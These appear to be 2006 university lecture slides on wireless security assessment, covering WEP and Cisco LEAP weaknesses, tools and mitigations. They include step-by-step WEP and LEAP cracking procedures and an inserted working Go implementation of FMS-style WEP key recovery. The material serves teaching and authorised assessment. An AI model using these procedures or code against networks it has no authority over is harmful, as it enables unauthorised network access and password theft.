Wireless Security Assessments
D. Grzetich - July 2006
DePaul University – TDC 531
DePaul University – TDC 531 – Wireless Security| 2
Outline
• Wireless Vulnerabilities
• Assessment Methodology
• Assessment Hardware/Software
• Cracking WEP
• Cracking LEAP
• Future Trends
Wireless Risks
Σ Wired Risks
+ Wireless Protocol Risks
= Wireless Risks
Wireless Vulnerabilities
• Accidental Association
– Clients are always attempting to connect to other devices
• Malicious Association
– Easy to coerce a client into associating with an attacker's device
• MAC Address Spoofing (Client)
– Access point MAC ACLs are ineffective; a client MAC address is trivial to change
• MAC Address Spoofing (Access Point)/MITM
– Difficult to detect a rogue access point that has changed its MAC address to
an authorized one
• Insertion
– The weak WEP encryption makes traffic insertion possible
What specific attacks are possible?
Wireless Vulnerabilities
• Interception and unauthorized monitoring
– Sniffing network traffic
– Broadcast nature
• Client-to-client attacks (see Black Hat 2006)
– Using the wireless network to attack workstations and servers directly
– Wireless driver flaws identified; buffer overflow attacks possible
• Encryption attacks
– Sniffing traffic to crack WEP keys
– Capture Cisco LEAP exchanges and crack offline
• Configuration attacks
– Factory-installed wireless devices with pre-configured (default) SSIDs, WEP
keys, user IDs, and passwords
Wireless Assessment Methodology
• Assessment pre-planning
• Locate and identify wireless devices
• Use available data to validate the location of the
wireless devices
• Identify vulnerabilities or weaknesses in the wireless
infrastructure
• Exploit identified weaknesses to attempt to gain access
• Collect, analyze, and document wireless security
findings
• Communicate the results to the appropriate individuals
Locate and Identify
• Scan surroundings for wireless components (Manual)
– Antennas
– Access Points
– Clients (Wireless NICs)
• Use tools to help identify wireless devices
– Collect as much information as possible
• SSID
• Location
• Information Field
• IP Addresses
– If the SSID is hidden (not broadcast), wait: it appears in the probe and association exchange when a client connects
• Use antennas to increase or focus coverage area
Locate and identify wireless devices
Validate
• Do the SSID or information fields contain recognizable phrases?
– Are the words significant to your business, or to a neighboring company?
• What is the coverage area for the wireless device?
– Does it cover the entire building?
– Is it localized to a corner of a floor?
– Attempt to monitor signal strength and determine location
• Have any public web sites (wardriving databases) already listed these devices?
– Search on the MAC address
– Search on the SSID if it is not a default
• Do any IP addresses identify the location?
Use available data to validate the location of the wireless devices
Identify Vulnerabilities
• Is WEP enabled?
• Do the SSIDs or information fields give away too much
information?
• Is any other form of encryption used? (VPN, Cisco LEAP,
EAP)
• Can I sniff network traffic and gather usernames and
passwords or other useful information?
Identify vulnerabilities and weaknesses in the wireless infrastructure
Exploit
• Is the signal strong enough to connect?
– Can I find a location where the strength is sufficient?
• Have I collected the SSID?
– Do I have time to wait for one?
• Is WEP or LEAP enabled?
– Can the WEP key be cracked?
– Can usernames and passwords be recovered from captured LEAP exchanges?
• Connect to known internal systems to prove access
Exploit identified weaknesses to attempt to gain access
Collect and Analyze Data
• What systems can be accessed through the wireless
infrastructure?
• What data is transmitted when accessing these systems?
• Was any sensitive information observed?
• What is the potential business impact?
• What is the recommended solution to mitigate the risks?
Collect, analyze, and document wireless security findings (continued)
Communicate
• What groups are responsible for the network infrastructure?
• Should Internal Audit be involved with the results?
• If rogue access points were found, what is the process to
remove them?
Communicate the results to the appropriate individuals
Communicate
Figure: Capability Maturity Model comparison against industry-recommended security practices
Assessment Hardware - NICs
• Lucent Hermes (Orinoco) based
– Used in Orinoco cards
– Supported by most wireless tools
– Includes an external antenna jack
• Intersil/Conexant Prism or Atheros based
– Used in SMC, Netgear, Linksys, D-Link, and most Proxim cards
– Commercial support OK
– The most common 802.11b network cards
• Cisco Aironet based
– Include proprietary features to improve 802.11 security: Cisco LEAP, EAP-FAST
– Longest range and best reception quality
Many types of NICs exist for wireless devices, with different features
Assessment Hardware - Antenna
Wireless antennas change the strength and reach of wireless detection and
fall into the following popular categories:
Omni-directional antenna
– Collects radio waves in a donut-shaped field around the antenna
– Gain ranges from 1 dBi to 15 dBi
– Shapes vary from a rod roughly 2 inches to 6 feet long to a slender
rectangle roughly 8 feet long
Yagi antenna
– Directional antenna with a very narrow focus
– Gain ranges from 8 dBi to 30 dBi
– Shape is a cylinder approximately two feet long and four inches in
diameter
Assessment Hardware - Antenna (continued)
Homemade antenna
– Similar in construction to a Yagi
– Pattern and gain depend on the size and materials used
Parabolic grid or dish antenna
– Used for long-distance communications
– Focused, narrow beam pattern with a longer reach than a Yagi
Assessment Hardware - GPS
• Satellite positioning system: a GPS receiver gives the assessor's own
coordinates at the moment each device is detected, which mapping tools use to
place the identified access points geographically
Global Positioning System (GPS)
Assessment Software - OS
Microsoft Windows
– Most people are comfortable navigating it
– Required by most commercial wireless security software
Linux
– Requires a more technical user to operate
– Most freeware wireless security tools only work on this platform, and the
freeware tools available here are superior
– Bootable (all-in-one) distributions such as WHAX or BackTrack
Assessment Software - Tools
Freeware Tools
– Kismet
– NetStumbler
– Wellenreiter
– Airsnort/Airodump/Wireshark
– Aircrack
– Asleap/void11
Commercial Tools
– AirMagnet Survey and Laptop Analyzer
– AiroPeek/OmniPeek by WildPackets
– Sniffer Wireless by Network General
Assessment Software - Kismet
• Most robust feature set for identifying access points (passive
monitoring, so hidden SSIDs are seen once a client connects)
• Works on laptops or handheld
devices
• Lacks integrated reporting
features
• Includes features to map
networks when combined with
a GPS
Kismet (Freeware, Linux)
Assessment Software - NetStumbler
• Most popular freeware tool for Windows, but it scans actively (broadcast
probe requests), so it cannot detect access points configured not to
broadcast their SSID or respond to such probes
NetStumbler (Freeware, Windows)
Sniffing Wireless Data – POP Mail
Sniffing Wireless - AIM
Cracking WEP
• No matter the key size, WEP can be cracked: the flaw is in how RC4 is used, not in the key length
• Aircrack uses the KoreK attacks, a family of statistical attacks that extend the FMS attack
– The FMS attack needed very large numbers of packets, since only "weak" IVs were usable
– KoreK's attacks use statistics over every captured IV, so the number of unique IVs, not raw packets, determines success
• Not enough packets?
– Use Aireplay to replay captured encrypted ARP or ICMP traffic back into the network; every reply the network sends carries a fresh IV
• The FBI had the time down to 3 minutes in a 2005 demonstration
• Alternatives
– Dictionary or brute-force attacks against keys produced by passphrase-based WEP key generators
– Chopchop attack: decrypt a packet byte by byte without the key by truncating it and replaying
modified versions, using the access point's response as an oracle (inverse induction)
Cracking WEP
WEP Cracking Steps:
1. Identify the target network by SSID, BSSID (AP MAC address) and channel
2. Lock the packet capture to that BSSID and channel
3. Use Kismet or Airodump to capture WEP-encrypted data frames
4. Use Aireplay to pick out encrypted ARP (or ICMP) requests by their characteristic size
5. Replay the captured ARP/ICMP traffic until a sufficient number of unique IVs has been
captured
6. Feed the capture file to Aircrack
7. If the first attempt fails, raise the fudge factor (a wider search through the vote table)
and retry; success is not guaranteed
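The vote-and-verify core of steps 5 to 7 in working code. This is an added example written for this page, not code from the deck and not Aircrack's own source: a minimal FMS-style key recovery in Go, with an ICV check on a captured frame as the final test and a small branching factor standing in for Aircrack's fudge factor. The capture is constructed inline (one frame per classic weak IV of the form (B+3, 255, X) for a 40-bit key); the key, the frame contents and every function name are assumptions for the demo, and KoreK's additional statistical attacks are not implemented.

```go
package main

import (
	"bytes"
	"crypto/rc4"
	"encoding/binary"
	"fmt"
	"hash/crc32"
	"sort"
)

// Packet is one captured WEP frame body: cleartext 3-byte IV, then RC4(plaintext || ICV).
type Packet struct {
	IV   [3]byte
	Body []byte
}

// wepEncrypt builds a frame like a WEP station: ICV = CRC-32 of the plaintext, RC4 keyed with IV || key.
func wepEncrypt(key []byte, iv [3]byte, plain []byte) Packet {
	var icv [4]byte
	binary.LittleEndian.PutUint32(icv[:], crc32.ChecksumIEEE(plain))
	msg := append(append([]byte{}, plain...), icv[:]...)
	c, _ := rc4.NewCipher(append(iv[:], key...))
	body := make([]byte, len(msg))
	c.XORKeyStream(body, msg)
	return Packet{IV: iv, Body: body}
}

// icvValid decrypts a packet with a candidate key and checks the ICV: the step that
// turns a statistical guess into a confirmed key.
func icvValid(key []byte, p Packet) bool {
	c, err := rc4.NewCipher(append(p.IV[:], key...))
	if err != nil || len(p.Body) < 5 {
		return false
	}
	plain := make([]byte, len(p.Body))
	c.XORKeyStream(plain, p.Body)
	n := len(plain) - 4
	return crc32.ChecksumIEEE(plain[:n]) == binary.LittleEndian.Uint32(plain[n:])
}

// fmsVotes attacks key byte B = len(prefix): replay the first B+3 steps of the RC4 key
// schedule (IV and recovered bytes are known), keep only "resolved" states where
// S[1] + S[S[1]] == B+3, and vote for the key byte that explains the first keystream
// byte. The first plaintext byte of an 802.11 data frame is the LLC DSAP 0xAA.
func fmsVotes(prefix []byte, pkts []Packet) [256]int {
	var votes [256]int
	B := len(prefix)
	for _, p := range pkts {
		k := append(p.IV[:], prefix...)
		var S [256]byte
		for i := range S { S[i] = byte(i) }
		j := 0
		for i := 0; i < B+3; i++ {
			j = (j + int(S[i]) + int(k[i])) & 0xff
			S[i], S[j] = S[j], S[i]
		}
		s1 := int(S[1])
		if s1 >= B+3 || s1+int(S[s1]) != B+3 {
			continue
		}
		z := p.Body[0] ^ 0xAA
		votes[(bytes.IndexByte(S[:], z)-j-int(S[B+3]))&0xff]++
	}
	return votes
}

// recoverKey is a miniature of Aircrack's search: keep the `branch` best-voted candidates
// per position (the fudge factor widens this set the same way) and backtrack until a
// full key validates a captured packet's ICV.
func recoverKey(pkts []Packet, keyLen, branch int) ([]byte, bool) {
	var search func(prefix []byte) ([]byte, bool)
	search = func(prefix []byte) ([]byte, bool) {
		if len(prefix) == keyLen {
			return prefix, icvValid(prefix, pkts[0]) // leaf: confirm or reject
		}
		votes := fmsVotes(prefix, pkts)
		cand := make([]int, 256)
		for i := range cand { cand[i] = i }
		sort.Slice(cand, func(a, b int) bool { return votes[cand[a]] > votes[cand[b]] })
		for _, c := range cand[:branch] {
			if key, ok := search(append(append([]byte{}, prefix...), byte(c))); ok {
				return key, true
			}
		}
		return nil, false
	}
	return search(nil)
}

// capturedPackets stands in for an airodump capture (constructed, not a real trace):
// one frame per classic weak IV (B+3, 0xFF, X) for every key byte B.
func capturedPackets(key []byte) []Packet {
	plain := []byte{0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00, 0x45, 0x00, 0x00, 0x54}
	var pkts []Packet
	for B := 0; B < len(key); B++ {
		for x := 0; x < 256; x++ {
			pkts = append(pkts, wepEncrypt(key, [3]byte{byte(B + 3), 0xFF, byte(x)}, plain))
		}
	}
	return pkts
}

func main() {
	key := []byte{0x0b, 0x4d, 0x92, 0xe7, 0x3c} // 40-bit key, chosen for the demo
	pkts := capturedPackets(key)
	got, ok := recoverKey(pkts, len(key), 3)
	fmt.Printf("%d unique IVs -> key %x (ok=%v)\n", len(pkts), got, ok)
}
```

Only about one weak IV in twenty actually leaks its key byte; the rest vote for random values, which is why the vote counts, not any single packet, decide each position and why the ICV check is needed at the end. The key length is a parameter, so a 104-bit key is attacked the same way once weak IVs for all 13 positions have been captured; in a real assessment those IVs come from the ARP replay in step 5.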
Cracking WEP - Aircrack
Cracking WEP – Stats and Tools
WEP (128 bit) Cracking Time in Seconds – 12/2004 – Michael Ossmann – SecurityFocus
(Columns: captured data packets, weak IVs, unique IVs, then seconds to recover the key per
tool; "Failed", "Error" and "Long" are the outcomes reported in the source.)

Data Packets  Weak IVs  Unique IVs  aircrack (4)  AirSnort  WepLab (95)  WEPCrack  dwepcrack
23457438      8560      16775533    245           92        244          Failed    Error
21016149      1807      16775167    249           41        247          Failed    Failed
19584364      9340      16275925    230           114       229          Failed    Failed
15690079      8694      12860342    184           90        179          Failed    Error
15628308      5505      12361369    176           70        174          Failed    Failed
11743639      8473      11743639    154           69        153          Failed    Error
11739339      3037      11693841    150           Failed    151          Failed    Failed
7829104       1001      5031233     74            Failed    77           Failed    Error
7799213       5225      7779299     87            37        101          Failed    Failed
4175159       1554      4069824     51            Failed    54           Failed    Failed
3914568       767       3914568     Failed        Failed    Failed       Failed    Error
3914553       3958      3914553     49            Failed    56           Failed    Error
3884657       1490      3864743     46            Failed    52           Failed    Failed
978652        986       978652      Failed        Failed    11           Failed    Error
978633        371       978633      12            Failed    13           Failed    Error
977219        264       974902      9             Failed    13           Failed    Failed
684992        143       684992      8             Failed    11           Failed    Error
683605        238       681288      18            Failed    13           Failed    Failed
587184        117       587184      27            Failed    Long         Failed    Error
489293        103       489293      7             Failed    5            Failed    Error
489286        115       489286      16116         Failed    Long         Failed    Error
391465        78        391465      13            Failed    Long         Failed    Error
391433        78        391433      6             Failed    6            Failed    Error
293596        65        293596      5             Failed    Long         Failed    Error
293579        65        293579      Failed        Failed    Failed       Failed    Error
Cracking Cisco LEAP
• Cisco's Lightweight Extensible Authentication Protocol, also marketed as Cisco EAP
– Billed as easy to use, secure, etc.
• Cisco licensed the supplicant code and treated the access point code as proprietary
• Dynamic WEP keys are distributed after authentication and rotated periodically
• The username and password are authenticated with an MS-CHAPv2-style challenge/response
– The NT password hash is unsalted
– The DES keys are derived weakly from that hash
– Username and domain are sent in cleartext
• Weakness in DES key selection from the NT hash
– Allows recovery of 2 bytes of the NT password hash from a single captured exchange
Cisco LEAP Process (diagram)
1. The access point issues an 8-byte challenge to the station.
2. The station uses its 16-byte NT hash to create three DES keys:
   DES key #1 = NT hash bytes 1-7
   DES key #2 = NT hash bytes 8-14
   DES key #3 = NT hash bytes 15-16 + five null bytes
   and encrypts the challenge with each key.
3. The station sends the 24-byte response (the three 8-byte DES outputs) to the access point.
Cracking Cisco LEAP
• The third DES key is the last 2 bytes of the NT hash padded with five null bytes
• Only 2^16 (65,536) possibilities for those 2 bytes, so they are found by brute force
against the last 8 bytes of the response
• Knowing the last 2 hash bytes reduces the password search space
– The NT hash cannot be inverted, but it is unsalted, so dictionary words can be hashed and compared
– Only about 1 in 65,536 candidate passwords hash to the observed 2-byte ending; only those
need the full response check
• Maybe this makes more sense graphically?
Cisco LEAP Cracking, Step-by-Step (diagram)
1. Capture the 8-byte challenge, the 24-byte response and the domain/username
   (Kismet, NetStumbler, etc.).
2. Deduce NT hash bytes 15-16 by brute force: DES key #3 is those 2 bytes plus five
   null bytes, so at most 65,536 trial encryptions of the challenge are needed to
   match the last 8 bytes of the response.
3. Compute the NT hash of every word in the dictionary file and match bytes 15-16
   against the recovered value to get the possible passwords.
4. Use each potential password to encrypt the challenge with all three DES keys;
   if the result equals the captured response, the password is found.
Cisco LEAP Example
Securing Wireless
Do Not Use The Following:
– SSID hiding/masking (an attacker simply waits for a client association to reveal it)
– MAC address filtering (a client MAC address is trivial to change on Linux)
– WEP
– Cisco LEAP
Do Use The Following:
– Policies and procedures
– Network architecture (segmentation of the wireless network)
– Strong encryption (VPN)
– Authentication (EAP/PEAP)
– Monitoring
– Assessments
Future Trends
Policy and procedure first
Difficulty of PKI deployment is slowing EAP/PEAP acceptance
Lack of security features in some hardware (Cisco wireless VoIP)
Security implications of installing wireless: regulatory compliance issues
(SOX, PCI, HIPAA, etc.)
Network segmentation: treat all wireless as guest (untrusted) access
Increase in monitoring and IPS
Conclusion
Questions?
